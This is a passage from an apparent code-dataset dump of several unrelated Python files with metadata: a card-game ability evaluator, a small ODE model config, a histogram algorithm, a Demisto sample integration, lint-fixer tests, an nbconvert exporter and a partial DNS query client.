zusaetzlich ob die karte effective is\n\ndef effectivnessDsty(target):\n if isMyCard(target._ingameId):\n return Effectivness.WORSE\n else:\n return Effectivness.GREAT\n \ndef toHero(value, effect):\n hero = [c for c in getMyCards().values() if c._cardtype == Cardtype.HERO]\n if effect == Effect.DMG:\n return (effectivnessDmg(hero, value), 1)\n if effect == Effect.RES:\n return (effectivnessRes(hero, value), 1)\n #zurueckschreiben\n \ndef toEnemyHero(value, effect):\n hero = [c for c in getEnemyCards().values() if c._cardtype == Cardtype.HERO]\n if effect == Effect.DMG:\n return (effectivnessDmg(hero, value), 1)\n if effect == Effect.RES:\n return (effectivnessRes(hero, value), 1)\n #zurueckschreiben \n\ndef toAllEnemyMinions(value, effect):\n e = 0\n targets = [c for c in getEnemyCards().values() if (c._zone == Zone.PLAY and c._cardtype == Cardtype.MINION)]\n if Effect.DMG == effect:\n for t in targets:\n e = e + effectivnessDmg(t, value)\n return (e, len(targets))\n if Effect.RES == effect:\n for t in targets:\n e = e + effectivnessRes(t, value)\n return (e, len(targets))\n\ndef toAllMyMinions(value, effect):\n e = -1\n targets = [c for c in getMyCards().values() if (c._zone == Zone.PLAY and c._cardtype == Cardtype.MINION)]\n if Effect.DMG == effect:\n for t in targets:\n e = e + effectivnessDmg(t, value)\n return (e, len(targets))\n if Effect.RES == effect:\n for t in targets:\n e = e + effectivnessRes(t, value)\n return (e, len(targets))\n \ndef toAllEnemyChars(value, effect):\n e1 = toAllEnemyMinions(value, effect)\n e2 = toEnemyHero(value, effect)\n return (e1[0] + e2[0], e1[1] + e2[1])\n\ndef toEachHero(value, effect):\n e1 = toEnemyHero(value, effect)\n e2 = toHero(value, effect)\n return (e1[0] + e2[0], e1[1] + e2[1])\n \ndef toAllMinions(value, effect):\n e1 = toAllEnemyMinions(value, effect)\n e2 = toAllMyMinions(value, effect)\n return (e1[0] + e2[0], e1[1] + e2[1])\n\ndef toALL(value, effect):\n e1 = toEachHero(value, effect)\n e2 = toAllMinions(value, effect)\n return (e1[0] + e2[0], e1[1] + e2[1])\n \ndef toAllOthers(card, value, effect):\n e = 0\n e1 = toAllEnemyChars(value, effect)\n e2 = toHero(value, effect) \n targets = [c for c in getMyCards().values() if (c._zone == Zone.PLAY and c._cardtype == Cardtype.MINION and not c._ingameID == card._ingameID)]\n if Effect.DMG == effect:\n for t in targets:\n e = e + effectivnessDmg(t, value)\n return (e + e1[0] + e2[0], len(targets) + e1[1] + e2[1])\n \ndef getAdjacent(target):\n targets = []\n if isMyCard(target._ingameID):\n for c in getMyCards().values():\n if not c._zonePos == 0:\n if (c._zonePos == target._zonePos - 1) or (c._zonePos == target._zonePos + 1):\n targets.append(c)\n else:\n for c in getEnemyCards().values():\n if not c._zonePos == 0:\n if (c._zonePos == target._zonePos - 1) or (c._zonePos == target._zonePos + 1):\n targets.append(c)\n return targets\n\ndef toAdjacent(value, effect, target):\n e = 0\n targets = getAdjacent(target)\n if Effect.DMG == effect:\n for t in targets:\n e = e + effectivnessDmg(t, value)\n return (e, len(targets))\n \n \ndef dmg(card, target):\n txt = card._text\n amount = 0\n effness = None\n sideEffnes = (0, 0)\n if 'Deal' in txt:\n amount = split(txt, 'Deal ', ' damage')\n elif 'deal' in txt:\n amount = split(txt, 'deal ', ' damage')\n try:\n if '-' in amount:\n mini, maxi = amount.split('-')\n amount = (int(mini)+int(maxi) / 2) \n else:\n amount = int(amount)\n if 'and' in txt:\n second = txt.split('and')[1]\n if E_HERO in second:\n sideEffnes = toEnemyHero(amount, Effect.DMG)\n elif 'damage' in second:\n new_amount = int(second.split('damage'))\n if Target.ADJACENT in second:\n sideEffnes = toAdjacent(new_amount, Effect.DMG, target)\n if 'all other enemies' in second:\n amount = amount - new_amount\n sideEffnes = toAllEnemyChars(new_amount, Effect.DMG)\n effness = (effectivnessDmg(target, amount) + sideEffnes, 1 + sideEffnes[1])\n except:\n amount = None\n if target == None and type(amount) is IntType :\n if Target.HERO in txt:\n effness = toHero(amount, Effect.DMG)\n elif Target.MINIONS in txt:\n effness = toAllMinions(amount, Effect.DMG)\n elif Target.E_MINIONS in txt:\n effness = toAllEnemyMinions(amount, Effect.DMG)\n elif Target.E_HERO in txt:\n effness = toEnemyHero(amount, Effect.DMG)\n elif Target.ALL in txt:\n effness = toALL(amount, Effect.DMG)\n elif Target.ENEMIES in txt:\n effness = toAllEnemyChars(amount, Effect.DMG)\n elif Target.OTHER in txt:\n effness = toAllOthers(card, amount, Effect.DMG)\n elif Target.HEROS in txt:\n pass\n elif Target.MINION in txt:\n pass\n effness = toEachHero(amount, Effect.DMG)\n elif Target.RANDOM in txt:\n pass\n return effness\n \n\ndef draw(card):\n txt = card._text\n amount = 0\n if 'Draw' in txt:\n amount = split(txt, 'Draw ', ' card')\n elif 'draw' in txt:\n amount = split(txt, 'draw ', ' card')\n if amount == 'a':\n amount = 1\n else:\n try:\n amount = int(amount)\n except:\n amount = None\n h_count = getMyHandcardCount()\n if h_count + amount > 10:\n return (Effectivness.WORSE, 1)\n elif h_count + amount == 10:\n return (Effectivness.LOW, 1)\n elif h_count <= 5:\n if amount > 1:\n return (Effectivness.GREAT, 1)\n else:\n return (Effectivness.GOOD, 1)\n \ndef summon(card):\n txt = card._text\n atk = 0\n m_count = getMyMinionCount()\n if 'summon' in txt:\n atk = split(txt, 'summon ', '/') \n elif 'Summon' in txt:\n atk = split(txt, 'Summon ', '/')\n amount, atk = atk.split(' ')\n #hlt = split(txt, '/', ' ')\n if amount == 'a':\n amount = 1\n elif amount == 'two':\n amount = 2\n elif amount == 'three':\n amount = 3\n if 'opponent' in txt:\n return (Effectivness.BAD, 1)\n elif amount + m_count > 7:\n return (Effectivness.WORSE, 1)\n elif amount + m_count == 7:\n return (Effectivness.BAD, 1)\n elif amount + m_count < 7 and not m_count == 0:\n return (Effectivness.GOOD, 1)\n elif m_count == 0:\n return (Effectivness.GREAT, 1)\n \ndef discard():\n return (Effectivness.BAD, 1)\n\ndef add():\n return (Effectivness.GOOD, 1)\n\ndef restore(card, target):\n txt = card._text\n amount = 0\n effness = None\n if 'full Health' in txt:\n amount = 99\n elif 'Restore' in txt:\n amount = int(split(txt, 'Restore ', 'Health'))\n elif 'restore' in txt:\n amount = int(split(txt, 'restore ', 'Health'))\n else:\n return (Effectivness.LOW, 1)\n if target is None:\n if Target.HERO in txt:\n effness = toHero(amount, Effect.RES)\n elif Target.MINIONS in txt:\n effness = toAllMinions(amount, Effect.RES)\n elif Target.ALL in txt:\n effness = toALL(amount, Effect.RES)\n else:\n if isMyCard(target._ingameID):\n effness = (effectivnessRes(target, amount), 1)\n else:\n effness = (effectivnessRes(target, amount), 1)\n return int(effness[0]/effness[1])\n \ndef equip(card):\n for c in getMyCards().value():\n if c.compareCardtype(Cardtype.WEAPON) and c.compareZone(Zone.PLAY):\n return (Effectivness.BAD, 1)\n return (Effectivness.GOOD, 1)\n\ndef transform(card, target):\n txt = card._text\n if 'Transform' in txt:\n if 'random' in txt:\n pass\n else:\n atk, hlt = txt.split('/')\n return effectivenessTrans(target, int(atk.split('a ')[1]), int(hlt.split(' ')[0])) \n\ndef gain(card):\n txt = card._text\n if 'Mana Crystal' in txt:\n return effectivnessGain(txt)\n elif 'Attack' in txt:\n return effectivnessGain(txt)\n elif 'Health' in txt:\n return effectivnessGain(txt)\n elif 'Armor' in txt:\n return (Effectivness.GOOD, 1)\n elif '/' in txt:\n return effectivnessGain(txt) \n elif 'Stealth' in txt or 'Divine Shield' in txt:\n return (Effectivness.GOOD, 1) \n\ndef returnToHand(card, target):\n txt = card._text\n if Target.MINIONS in txt:\n if getEnemyMinionCount() - getMyMinionCount() > 0 and MinionDmg() - EnemyAttackPower() > 0:\n return (Effectivness.GREAT, 1)\n elif MinionDmg() - EnemyAttackPower() > 0:\n return (Effectivness.GOOD, 1)\n elif 'to life' in txt:\n if 'with 1 Health' in txt:\n return (Effectivness.GOOD, 1)\n elif 'with full Health' in txt and target.getDamage()/target.getHealth() < 0.5:\n return (Effectivness.GREAT, 1)\n else:\n return (Effectivness.LOW, 1)\n else:\n return effectivnessRet(target)\n \ndef enrage(card):\n if card.getHealth() > 1:\n return (Effectivness.GOOD, 1)\n else:\n return (Effectivness.BAD, 1)\n\ndef cost(card): \n txt = card._text\n if 'cost' in txt:\n try:\n red = int(split(txt,'(', ')'))\n if 'less' in txt:\n if 'Your' in txt:\n if red == 0:\n return (Effectivness.GREAT, 1)\n else:\n return (Effectivness.GOOD, 1)\n elif 'Enemy' in txt:\n return (Effectivness.BAD, 1)\n elif 'more' in txt:\n if 'Your' in txt:\n return (Effectivness.BAD, 1)\n elif 'Enemy' in txt:\n return (Effectivness.GOOD, 1)\n except:\n return Effectivness.LOW\n \ndef destroy(card, target):\n txt = card._text\n if target is None:\n if Target.MINIONS in txt:\n if getMyMinionCount() - getEnemyMinionCount() < 0:\n return (Effectivness.GOOD, 1)\n else:\n return (Effectivness.BAD, 1)\n elif Target.OTHER in txt:\n return (Effectivness.GOOD, 1)\n else:\n if isMyCard(target._ingameID):\n return (Effectivness.WORSE, 1)\n else:\n return (Effectivness.GREAT, 1) \n \ndef generell(card):\n effnes = 0\n effnes = effnes + (card._attack - card._manacosts) + (card._health - card._manacosts)\n if effnes < 0:\n return (Effectivness.BAD, 1)\n elif effnes > 0:\n return (Effectivness.GOOD, 1)\n else:\n return (Effectivness.LOW, 1)\n \ndef isDefensiveCard(card, targets): \n if card.compareCardtype(Cardtype.SPELL) or card.compareCardtype(Cardtype.MINION):\n target = None\n if 'Give' in card._text and ('Taunt' in card._text or 'Divine Shield' in card._text) and not getMyMinionCount() == 0:\n return True\n elif 'Restore' or 'restore' in card._text:\n if targets is not None:\n eff = None\n for t in targets:\n t = getCardByIngameId(t)\n e = restore(card, t) \n if e > eff or eff is None:\n eff = e\n target = t \n \n else:\n eff = restore(card, None)\n elif 'Gain' in card._text and 'Armor' in card._text:\n eff = gain(card)\n elif card.compareCardtype(Cardtype.MINION):\n eff = generell(card)\n if targets is not None:\n high = None\n for t in targets:\n t = getCardByIngameId(t)\n e = effectivness(card, t) \n if e > high or high is None:\n high = e\n target = t \n else:\n high = effectivness(card, None)\n eff = (eff[0] + high[0])/(eff[1] + high[1])\n if card._taunt:\n eff = eff + 0.5\n if card._divineShield:\n eff = eff + 0.5\n eff = round(eff, 0)\n if eff >= Effectivness.GOOD:\n return (True, target)\n return (False, None)\n \ndef attackEffectivness(attacker, target):\n a_l = attacker.getHealth() - target.getAttack()\n t_l = target.getHealth() - attacker.getAttack()\n if a_l > 0 and t_l <= 0:\n return Effectivness.GOOD\n elif a_l <= 0 and t_l <= 0:\n return Effectivness.LOW\n elif a_l <= 0 and t_l > 0:\n return Effectivness.BAD\n elif target.getHealth() == t_l and target._divineShield:\n Effectivness.LOW\n elif t_l == target.getHealth():\n return Effectivness.WORSE\n elif a_l == attacker.getHealth():\n return Effectivness.GREAT\n \ndef singleThread(card):\n hero = getMyHero()\n percent = card.getAttack()/(hero._health - hero._armor)\n if percent > 0.2:\n ThreatLvl.HIGH\n elif percent > 0.13:\n ThreatLvl.INCREASED\n elif percent > 0.05:\n ThreatLvl.NORMAL\n elif percent <= 0.05:\n ThreatLvl.LOW\n elif percent == 0:\n ThreatLvl.NONE\n\ndef eff_weapon():\n weapon = [c for c in getMyCards().value() if c.compareCardtype(Cardtype.WEAPON) and c.compareZone(Zone.PLAY)]\n if len(weapon) == 0:\n return Effectivness.GOOD\n else:\n return Effectivness.WORSE\n \n \ndef effectivness(card, target):\n txt = card._text\n e = (0, 0)\n if card.compareZone(Zone.HAND):\n if 'Damage' in txt or 'damage' in txt:\n v = dmg(card, target)\n e = (e[0] + v[0], e[1] + v[1]) \n elif 'Destroy' in txt or 'destroy' in txt:\n v = destroy(card, target)\n e = (e[0] + v[0], e[1] + v[1])\n elif 'cost' in txt:\n v = cost(card)\n e = (e[0] + v[0], e[1] + v[1])\n elif 'Enrage' in txt:\n v = enrage(card)#\n e = (e[0] + v[0], e[1] + v[1])\n elif 'return' in txt or 'Return' in txt:\n v = returnToHand(card, target)\n e = (e[0] + v[0], e[1] + v[1])\n elif 'gain' in txt or 'Gain' in txt:\n v = gain(card)\n e = (e[0] + v[0], e[1] + v[1])\n elif 'Transform' in txt or 'transform' in txt:\n v = transform(card, target)\n e = (e[0] + v[0], e[1] + v[1])\n elif 'Equip' in txt or 'equip' in txt:\n v = equip(card)\n e = (e[0] + v[0], e[1] + v[1])\n elif 'Restore' in txt or 'restore' in txt:\n v = restore(card, target)\n e = (e[0] + v[0], e[1] + v[1])\n elif 'Add' in txt or 'add' in txt:\n v = add()\n e = (e[0] + v[0], e[1] + v[1])\n elif 'Discard' in txt or 'discard' in txt:\n v = discard()\n e = (e[0] + v[0], e[1] + v[1])\n elif 'summon' in txt or 'Summon' in txt:\n v = summon(card)\n e = (e[0] + v[0], e[1] + v[1])\n elif 'Draw' in txt or 'draw' in txt:\n v = draw(card)\n e = (e[0] + v[0], e[1] + v[1])\n return round(e[0]/e[1], 0)\n elif card.compareZone(Zone.PLAY):\n return attackEffectivness(card, target)","sub_path":"Bachelor/Ba/AbilityInterpreter.py","file_name":"AbilityInterpreter.py","file_ext":"py","file_size_in_byte":19743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"500051329","text":"# This file contains the information about the model\n\n# Set Hidden Input Knots\nhi_knots = [1,3]\n\n# Define Parameters of the model as a list\n\nparameters = {\t'a1' : 0.1 , \n\t\t'a2' : 0.1 ,\n\t\t'a3' : 0.1 ,\n 'a4' : 0.1 ,\n\t\t'b1' : 0.2 ,\n\t\t'b2' : 0.2 ,\n\t\t'b3' : 0.2 ,\n 'b4' : 0.2 ,\n\n\t\t'alpha1': 0.1, # L1 regularisation\n\t\t'alpha2': 0.1 # L2 regularisation\n}\n\n# Declare variables and inital values\n\nvariables = { \t'x1' : 1 , \n\t\t'x2' : 0.01 , \n\t\t'x3' : 0.01 ,\n 'x4' : 0.01\n}\n\n# Define System equations (dx1 abbrev. dx1/dt )\n\nequations = {\t'dx1' : '-a1 * x1 + b4 * x4' ,\n\t\t'dx2' : '-a2 * x2 + b1 * x1' ,\n\t\t'dx3' : '-a3 * x3 + b2 * x2' ,\n 'dx4' : '-a4 * x4 + b3 * x3'\n}\n\n# Define Observables\n\nobservables = { 'y1' : 'x1 + x2 + 2*x3' ,\n\t\t'y2' : 'x2 + 2 * x3' ,\n 'y3' : 'x3'\n} \n\n","sub_path":"APMonitor/Template/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"140433440","text":"# A very elegant solution introduced by https://leetcode.com/problems/largest-rectangle-in-histogram/discuss/28917/AC-Python-clean-solution-using-stack-76ms\n# The explanation to this algorithm: https://www.youtube.com/watch?v=VNbkzsnllsU \nclass Solution(object):\n def largestRectangleArea(self, heights):\n \"\"\"\n :type heights: List[int]\n :rtype: int\n \"\"\"\n stack = [-1]\n heights += [0]\n res = 0\n for i in range(len(heights)):\n while heights[i] < heights[stack[-1]]:\n current_index = stack.pop(-1)\n length = i - stack[-1] - 1\n height = heights[current_index]\n res = max(res, height * length)\n stack.append(i)\n return res","sub_path":"84. Largest Rectangle in Histogram/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"443676711","text":"\nimport argparse\nimport queue\nimport database\nimport hotspot\n\n\ntasks = []\n\ndef init_tasks(hostnames):\n \"\"\" Initializes all hotspot tasks in parallel. \"\"\"\n global tasks\n for hostname in hostnames:\n task = {}\n task[\"hostname\"] = hostname\n task[\"queue\"] = queue.Queue()\n task[\"hotspot\"] = hotspot.Hotspot(hostname, task[\"queue\"])\n task[\"hotspot\"].start()\n tasks.append(task)\n\ndef join_tasks():\n global tasks\n for task in tasks:\n task[\"hotspot\"].join()\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"database\", help=\"Hotspot database file.\")\n args = parser.parse_args()\n\n db = database.Database(args.database)\n hostnames = db.get_hostnames()\n\n init_tasks(hostnames)\n for task in tasks:\n task[\"queue\"].put(\"quit\")\n join_tasks()\n","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"277648788","text":"import os\nimport os.path\n\nimport jinja2\nfrom nbconvert.exporters.html import HTMLExporter\n\n\n@jinja2.contextfunction\ndef include_template(ctx, name):\n \"\"\"Include a file relative to this file\n \"\"\"\n env = ctx.environment\n return jinja2.Markup(env.loader.get_source(env, name)[0])\n\n\n@jinja2.contextfunction\ndef include_external_file(ctx, name):\n \"\"\"Include an encoded base64 image\n \"\"\"\n with open(os.path.abspath(name), \"r\") as f:\n content = f.read()\n return jinja2.Markup(content)\n\n\n@jinja2.contextfunction\ndef include_external_base64_img(ctx, name):\n \"\"\"Include an encoded base64 image\n \"\"\"\n import base64\n\n with open(os.path.abspath(name), \"rb\") as f:\n encoded_string = base64.b64encode(f.read())\n return jinja2.Markup(encoded_string.decode())\n\n\nclass NBConvertFlexExporter(HTMLExporter):\n\n # \"File -> Download as\" menu in the notebook\n export_from_notebook = \"Flex Dashboard\"\n\n extra_loaders = [jinja2.PackageLoader(__name__, \"\")]\n\n @property\n def template_path(self):\n \"\"\"\n Append nbconvert_templates to the default HTML ones we are extending\n \"\"\"\n return super().template_path + [\n os.path.join(os.path.dirname(__file__), \"nbconvert_templates\")\n ]\n\n def _template_file_default(self):\n \"\"\"\n We want to use the new template we ship with our library.\n \"\"\"\n return \"nbconvert\" # full\n\n def __init__(self, *args, **kwargs):\n super(HTMLExporter, self).__init__(*args, **kwargs)\n self.environment.globals[\"include_template\"] = include_template\n self.environment.globals[\"include_external_file\"] = include_external_file\n self.environment.globals[\n \"include_external_base64_img\"\n ] = include_external_base64_img\n\n def default_filters(self):\n for pair in super(HTMLExporter, self).default_filters():\n yield pair\n yield (\"test_filter\", self.test_filter)\n\n def test_filter(self, text):\n return \"test_filter: \" + text\n","sub_path":"jupyter_flex/nbconvert_exporter.py","file_name":"nbconvert_exporter.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"565742792","text":"import demistomock as demisto\nfrom CommonServerPython import *\nfrom CommonServerUserPython import *\n''' IMPORTS '''\n\nimport json\n\n\ndef test_module():\n \"\"\"\n returning 'ok' indicates that the integration works like it is supposed to. Connection to the service is successful.\n \"\"\"\n return 'ok'\n\n\ndef fetch_incidents(last_run):\n \"\"\"\n This function will execute every 1 minute.\n\n :return: next_run, list of incidents that will be created in Demisto\n \"\"\"\n # Get the last fetch time, if exists\n last_fetch = last_run.get('last_fetch')\n\n # Handle first time fetch\n if last_fetch is None:\n last_fetch = 0\n\n incidents = [\n {\n 'name': f'Hello incident {last_fetch + 1}',\n 'rawJSON': json.dumps({\n 'hello': 'world'\n })\n },\n {\n 'name': f'Hello incident {last_fetch + 2}',\n 'rawJSON': json.dumps({\n 'hello': 'world'\n })\n }\n ]\n\n next_run = {'last_fetch': last_fetch + 2}\n return next_run, incidents\n\n\ndef say_hello_command(args):\n name = args.get('name')\n\n return f'## Hello {name}'\n\n\ndef main():\n try:\n if demisto.command() == 'test-module':\n result = test_module()\n demisto.results(result)\n\n if demisto.command() == 'helloworldsimple-say-hello':\n results = say_hello_command(demisto.args())\n return_outputs(readable_output=results, outputs=None)\n\n if demisto.command() == 'fetch-incidents':\n next_run, incidents = fetch_incidents(demisto.getLastRun())\n demisto.setLastRun(next_run)\n demisto.incidents(incidents)\n\n except Exception as e:\n return_error(f'Failed to execute {demisto.command()} command. Error: {str(e)}')\n\n\nif __name__ in ('__main__', '__builtin__', 'builtins'):\n main()\n","sub_path":"Integrations/HelloWorldSimple/HelloWorldSimple.py","file_name":"HelloWorldSimple.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"293963523","text":"from __future__ import absolute_import\nimport os\nimport lintreview.fixers as fixers\nfrom lintreview.diff import parse_diff, Diff\nfrom lintreview.tools.phpcs import Phpcs\nfrom lintreview.utils import composer_exists\nfrom unittest import skipIf\nfrom mock import Mock\nfrom nose.tools import (\n assert_raises,\n assert_in,\n eq_,\n with_setup\n)\nfrom .. import load_fixture, fixtures_path\nfrom ..test_git import setup_repo, teardown_repo, clone_path\n\n\nphpcs_missing = not(composer_exists('phpcs'))\n\n\ndef test_run_fixers():\n # Test that fixers are executed if fixer is enabled\n mock_tool = Mock()\n mock_tool.has_fixer.return_value = True\n files = ['diff/adjacent_original.txt']\n\n out = fixers.run_fixers([mock_tool], fixtures_path, files)\n eq_(1, mock_tool.execute_fixer.call_count)\n eq_(0, len(out))\n\n\ndef test_run_fixers__no_fixer_mode():\n # Test that fixers are skipped when has_fixer fails\n # Test that fixers are executed if fixer is enabled\n mock_tool = Mock()\n mock_tool.has_fixer.return_value = False\n files = ['diff/adjacent_original.txt']\n\n out = fixers.run_fixers([mock_tool], fixtures_path, files)\n eq_(0, mock_tool.execute_fixer.call_count)\n eq_(0, len(out))\n\n\n@skipIf(phpcs_missing, 'Needs phpcs')\n@with_setup(setup_repo, teardown_repo)\ndef test_run_fixers__integration():\n # Test fixer integration with phpcs.\n tail_path = 'tests/fixtures/phpcs/has_errors.php'\n file_path = os.path.abspath(clone_path + '/' + tail_path)\n phpcs = Phpcs(Mock(), {'fixer': True})\n\n diff = fixers.run_fixers([phpcs], clone_path, [file_path])\n eq_(1, len(diff))\n eq_(tail_path, diff[0].filename)\n\n\ndef test_find_intersecting_diffs():\n original = load_fixture('diff/intersecting_hunks_original.txt')\n updated = load_fixture('diff/intersecting_hunks_updated.txt')\n original = parse_diff(original)\n updated = parse_diff(updated)\n result = fixers.find_intersecting_diffs(original, updated)\n\n eq_(1, len(result))\n assert isinstance(result[0], Diff)\n eq_('model.php', result[0].filename)\n eq_('00000', result[0].commit)\n\n\ndef test_find_intersecting_diffs__no_intersect():\n original = load_fixture('diff/intersecting_hunks_original.txt')\n updated = load_fixture('diff/adjacent_original.txt')\n original = parse_diff(original)\n updated = parse_diff(updated)\n result = fixers.find_intersecting_diffs(original, updated)\n\n eq_(0, len(result))\n\n\ndef test_apply_fixer_diff__missing_strategy_key():\n original = Mock()\n changed = Mock()\n context = {}\n with assert_raises(fixers.StrategyError) as err:\n fixers.apply_fixer_diff(original, changed, context)\n assert_in('Missing', str(err.exception))\n\n\ndef test_apply_fixer_diff__invalid_strategy():\n original = Mock()\n changed = Mock()\n context = {'strategy': 'bad stategy'}\n with assert_raises(fixers.StrategyError) as err:\n fixers.apply_fixer_diff(original, changed, context)\n assert_in('Unknown', str(err.exception))\n\n\ndef test_apply_fixer_diff__missing_strategy_context():\n original = Mock()\n changed = Mock()\n context = {'strategy': 'commit'}\n with assert_raises(fixers.StrategyError) as err:\n fixers.apply_fixer_diff(original, changed, context)\n assert_in('Could not create strategy', str(err.exception))\n\n\ndef test_apply_fixer_diff__strategy_execution_fails():\n strategy_factory = Mock()\n strategy = Mock()\n strategy.execute.side_effect = RuntimeError\n strategy_factory.return_value = strategy\n\n fixers.add_strategy('mock', strategy_factory)\n\n original = load_fixture('diff/intersecting_hunks_original.txt')\n updated = load_fixture('diff/intersecting_hunks_updated.txt')\n original = parse_diff(original)\n updated = parse_diff(updated)\n\n context = {'strategy': 'mock'}\n out = fixers.apply_fixer_diff(original, updated, context)\n eq_(1, strategy.execute.call_count)\n eq_(out, None, 'No output and no exception')\n\n\ndef test_apply_fixer_diff__calls_execute():\n strategy_factory = Mock()\n strategy = Mock()\n strategy_factory.return_value = strategy\n\n fixers.add_strategy('mock', strategy_factory)\n\n original = load_fixture('diff/intersecting_hunks_original.txt')\n updated = load_fixture('diff/intersecting_hunks_updated.txt')\n original = parse_diff(original)\n updated = parse_diff(updated)\n\n context = {'strategy': 'mock'}\n fixers.apply_fixer_diff(original, updated, context)\n eq_(1, strategy.execute.call_count)\n","sub_path":"tests/fixers/test_init.py","file_name":"test_init.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"226379986","text":"#!/usr/local/bin/python3\n\nimport argparse\nimport socket\nimport sys\nfrom enum import Enum\nfrom contextlib import contextmanager\nimport random\n\nDNS_SERVER = \"8.8.8.8\"\n\n\nclass DomainType(Enum):\n A = 1\n CNAME = 5\n NULL = 10\n PTR = 12\n MX = 15\n TXT = 16\n AAAA = 28\n\n\nclass DNSAnswer(object):\n\n SKIP_BYTES = 12\n\n @staticmethod\n def handle_ip4(packet, start):\n length = DNSAnswer.read_length(packet, start)\n start = start + DNSAnswer.SKIP_BYTES\n\n ip = packet[start: start + length]\n return \".\".join([str(x) for x in ip])\n\n @staticmethod\n def handle_ip6(packet, start):\n length = DNSAnswer.read_length(packet, start)\n start = start + DNSAnswer.SKIP_BYTES\n\n ip = packet[start: start + length]\n result = \"\"\n for i, num in enumerate(ip):\n result += format(num, '02x')\n if i % 2 != 0:\n result += \":\"\n return result[:-1]\n\n @staticmethod\n def handle_mx(packet, start):\n start = start + DNSAnswer.SKIP_BYTES\n preference = packet[start+1]\n\n server = DNSAnswer._handle_mx(packet, start+2)\n return \".\".join(server)\n\n @staticmethod\n def _handle_mx(packet, start):\n current = start + 1\n length = packet[start]\n\n sections = []\n\n while length != 0 and length != 192:\n sections.append(packet[current:current+length].decode('ISO-8859-1'))\n current, length = current+length+1, packet[current+length]\n\n if length == 192:\n follow = DNSAnswer._handle_mx(packet, packet[current])\n sections.extend(follow)\n\n return sections\n\n\n @staticmethod\n def handle_cname(packet, start):\n start = start + DNSAnswer.SKIP_BYTES\n\n server = DNSAnswer._handle_mx(packet, start)\n return \".\".join(server)\n\n @staticmethod\n def handle_txt(packet, start):\n length = DNSAnswer.read_length(packet, start)\n start = start + DNSAnswer.SKIP_BYTES\n return packet[start:start+length].decode('ISO-8859-1')\n\n @staticmethod\n def read_length(packet, start):\n return packet[start + DNSAnswer.SKIP_BYTES - 1]\n\n\nHANDLERS = {\n DomainType.A: DNSAnswer.handle_ip4,\n DomainType.AAAA: DNSAnswer.handle_ip6,\n DomainType.MX: DNSAnswer.handle_mx,\n DomainType.CNAME: DNSAnswer.handle_cname,\n DomainType.TXT: DNSAnswer.handle_txt,\n DomainType.PTR: DNSAnswer.handle_cname\n}\n\n\nclass DNSReader(object):\n def __init__(self, hostname, dns=DNS_SERVER, reverse=False):\n if reverse:\n hostname = \".\".join(hostname.split(\".\")[::-1])\n hostname = hostname + \".in-addr.arpa\"\n\n self.hostname = hostname\n self.dns = dns\n self.reverse = reverse\n self.id = [random.randint(0, 255), random.randint(0, 255)]\n self.header = self.id + [1, 0, 0, 1, 0, 0, 0, 0, 0, 0]\n self.queries = []\n\n def add_query(self, type):\n if self.reverse and type != DomainType.PTR:\n log_error(Errors.NON_PTR)\n self.queries.append(self._generate_query(type))\n\n @property\n def requests(self):\n for query in self.queries:\n yield bytes(self.header + query)\n\n @property\n def answers(self):\n answers = {}\n\n for response in self.query(self.dns):\n for type, answer in self.scan(response):\n answer_item = answers.get(type, set())\n answers[type] = answer_item.union([answer])\n\n return answers\n\n def query(self, dns_server=DNS_SERVER):\n with open_socket(dns_server, 53) as socket:\n for request in self.requests:\n socket.sendall(request)\n reply = socket.recv(4096)\n\n yield bytearray(reply)\n\n def scan(self, response):\n if self.id != [response[0], response[1]]:\n log_error(Errors.DNS_ID_ERROR)\n\n options = convert_binary(response[2])\n options += convert_binary(response[3])\n\n if options[0] != 1:\n log_error(Errors.NON_RESPONSE_ERROR)\n\n query_count = response[5]\n answer_count = response[7]\n authority_count = response[9]\n additional_count = response[11]\n\n start = 16 + len(self._encode_hostname(self.hostname))\n offset = start\n for answer in range(answer_count):\n length = DNSAnswer.read_length(response, offset)\n yield self.scan_answer(response, offset)\n offset += length + 12\n\n def scan_answer(self, response, start):\n type = DomainType(response[start + 3])\n\n handler = HANDLERS.get(type, lambda x, y: None)\n result = handler(response, start)\n\n return type, result\n\n def _generate_query(self, type):\n query = self._encode_hostname(self.hostname)\n query.extend([0, type.value])\n query.extend([0, 1])\n return query\n\n @staticmethod\n def _encode_hostname(hostname):\n parts = hostname.split(\".\")\n\n bytes = []\n for part in parts:\n bytes.append(len(part))\n for letter in part:\n bytes.append(ord(letter))\n bytes.append(0)\n\n return bytes\n\n\nclass Errors(Enum):\n \"\"\"An Enum representing the types of errors that may occur.\"\"\"\n SOCKET_ERROR = \"Unable to open TCP socket connection to {}\"\n HOSTNAME_ERROR = \"Hostname ({}) could not be resolved.\"\n HTTPS_ERROR = \"Could not could to HTTPS address {}\"\n SEND_ERROR = \"Could not send data to open TCP socket\"\n DNS_ID_ERROR = \"DNS ID of response packet does not match request packet\"\n NON_RESPONSE_ERROR = \"Attempted to read a non-response packet\"\n NON_PTR = \"Attempted to add a non-pointer request to reverse lookup\"\n\n\ndef log_error(error, *parameters):\n \"\"\"\n Log that an error has occurred and exit the program.\n\n Args:\n error (Errors): The type of error that has occurred.\n *parameters (*): Any extra information relevant to the error.\n \"\"\"\n print(error.name, \":\", error.value.format(*parameters))\n sys.exit(1)\n\n\n@contextmanager\ndef open_socket(ip, port=80):\n \"\"\"\n Open a socket to an IP Address and a port.\n Automatically close connection using a context manager.\n\n Args:\n ip (str): The IP address with which a connection is opened.\n port (int): The port with which a connection is opened.\n\n Yields:\n (socket.socket): A socket connection to the given 